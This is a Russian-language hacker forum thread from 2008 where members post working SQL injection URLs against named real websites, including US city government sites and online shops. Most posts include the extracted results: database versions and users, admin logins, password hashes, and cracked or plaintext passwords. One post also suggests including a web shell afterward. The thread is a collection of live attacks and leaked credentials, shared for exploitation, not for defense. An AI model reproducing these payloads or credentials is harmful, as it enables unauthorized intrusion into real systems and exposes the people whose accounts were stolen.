SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://www.irvconsulex.cz/

    Code:
    http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--
    version() - 4.1.18-log
    user() - irvconsulex-cz@localhost
    database() - logirvconsulex-cz

    Админ:
    Code:
    http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password)+from+jos_users+limit+0,1--
    login/hash/salt:

    admin : 506e5a43e1ed6052fc003c157483b73d : IUsUB8uMKz7Qt2wJ
     
  2. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://www.cm-lousa.pt/servicos/news.php?id=99999+union+select+1,concat_ws(0x40,host,user,password,file_priv,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*
     
    1 person likes this.
  3. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.wtopnews.com/index.php?nid=25&sid=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
    Code:
    http://www.lam.org/news/article.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
     
  4. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    5.0.45:tri:tri@localhost
     
  5. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    Proover.Com
    Code:
    http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--
    =\\\
     
    1 person likes this.
  6. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Интересно по нему лазить, раскрутил бы дальше ;)

    Версия > 5 => узнаем пасс легко.
    Code:
    http://proover.com/search_results.php?cid=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x457368705f6d656d62657273--
    Тэкс, Es_pwd и admin_name то, что нас интересует.

    Code:
    http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_admin_name,0x3a,es_pwd)3,4,5,6+from+eshp_admin--
    Получаем Admin:A

    Полезли в мемберс:
    Code:
    http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_username,0x3a,es_password),3,4,5,6+from+eshp_members+limit+2,1--
    И вот пошли логины с пассами.
    Пассы открытые :)
     
    2 people like this.
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.scooter-center.ru/detail/?id=-1+union+select+concat(0x3a3a,login,0x3a3a,password,0x3a3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+cmf3_sc.bof_users+limit+0,1/*

    login: wolf pass: 123
    --------------------------------------------------

    http://www.travelnetcuba.it/hotels.php?id_hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(table_name,0x3a3a,table_schema),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+limit+37,1/*

    login: lorenzo
    pass: 883777
    --------------------------------------------


    http://www.ipiccolissimi.it/root/catalogo.php?cat=1&tipologia=1&idMacro=37&idMicro=-1+union+select+1,concat(0x3a3a,login,0x3a3a,password)+from+utenti+limit+0,1/*
    login: ipiccolissimi
    pass: natura06thamm04

    ---------------------------------------------
     
    1 person likes this.
  8. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    .us

    Code:
    http://www.turkuaz.us/content.php?magId=-25+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7--
    version() - :4.1.22
    user() - [email protected]
    database() - turkuazus
     
  9. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://laneuse.ci.minneapolis.mn.us

    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(version(),0x3a,user(),0x3a,database()),2,3,4,5--
    version() - 5.0.58
    user() - traffic7@localhost
    database() - tmo

    До пасса добраться удалось, он в открытом виде:
    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(login,0x3a,password),2,3,4,5+from+users+limit+0,1--
    Login/password:

    jason / bond007 (пасс улыбнул)... :)

    --------------------------------------------------------------------
    Еще чуть-чуть (тож .us):
    http://mobile.sugarcube.us
    Code:
    http://mobile.sugarcube.us/details.php?id=-1+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11--

    version() - 4.0.27-max-log
    user() - [email protected]
    database() - newvintage
     
    #6509 USAkid, 8 Sep 2008
    Last edited: 8 Sep 2008
  10. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    И еще немного .us

    http://www.ultrashine.us

    Code:
    http://www.ultrashine.us/product_item.php?cat=&item=-7+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14--
    version() - 4.0.27-max-log
    user() - [email protected]
    database() - db206430733

    --------------------------------------------------------------------

    http://www2.ci.poway.ca.us/

    Code:
    http://www2.ci.poway.ca.us/pcpa/pcpadetail.php?eventid=176+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
    version() - 5.0.60-log
    user() - powaycity@localhost
    database() - powaycity
     
  11. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.uniprod.ru

    алкошоп)

    version() = 4.1.22
    user() = uniprod@localhost
    database() = wwwuniprodru


    http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),user(),database())/*

    есть табличка fs_users с полями:
    uname
    passwd
    uid
    email


    вот конечный запрос,пассы в md5, но в основном есть в он-лайн базах...

    http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,uname,email,passwd)+from+fs_users+limit+0,1/*
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Данные по полям user,password из таблицы admin_packer.admin_users:
    -------
    kosty:*CAA6A6EB56FA8757200E1BA2FAD09CD01220317A
    lena:*348D2F9427DAD0C3D0EDBE03182DA2FB9E4C5DBF
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+concat_ws(0x3a,id,user_name,user_pass,user_mail,user_icq)+from+itaf_user+limit+0,1/*
     
    _________________________
    1 person likes this.
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Dbname:mycricket
    Version:5.0.51a-community-log
    User:[email protected]

    ========================================
    DBname:sherlock_holmes
    Version:4.1.22-standard
    User:sherlock_general@localhost
     
    #6514 $n@ke, 9 Sep 2008
    Last edited: 9 Sep 2008
    1 person likes this.
  15. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    http://www.aavba.org/

    Скуль:
    Логин: VBSLLC
    хеш: 5b5f366f63b42b17
    Расшифровка хеша: noodles1

    В админке есть какая то биллинг панель, на счету 99 $, также на сколько я понял сайт
    принадлежит этому же админу...
    В общем, если кто дальше нароет, отпишитесь плиз!

    И еще чуток разношерстных скулей:
     
    #6515 Twoster, 10 Sep 2008
    Last edited: 10 Sep 2008
    1 person likes this.
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
  17. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    PageRank: 5 тИЦ: 110

    http://www.amadeo-russia.ru/brand/?brand=-1+union+select+1,table_name,concat_ws(0x2f,version(),user(),database()),4,5,6/*
    (вывод в титле)

    интересные таблы:
    ws_users
    ws_users2
    bof_users
    cmf_users
    chat_users
    invforumapi_users
    invforummeetings_user
    users


    админки я так и не нашел, скорее всего ее нету:)
     
    #6517 AkyHa_MaTaTa, 10 Sep 2008
    Last edited: 10 Sep 2008
  18. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    И еще маленько:
     
    1 person likes this.
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    ппц как жрать охота..вот замена небольшая))
    Name: test
    Version: 4.1.22-log
    Username: arundquist@localhost



    ADD
    ============================================
    Database name: celtnet
    Version: 4.1.19-standard-log
    Username: celtnet@localhost

    там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((

    зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).
     
    #6519 $n@ke, 10 Sep 2008
    Last edited: 10 Sep 2008
    2 people like this.
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://taro.in.ua/index.php?page=subarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8+from+f_users/*

    http://taro.in.ua/forum

    login: Филиса <-модер
    pass: draco
     
    1 person likes this.
Thread Status:
Not open for further replies.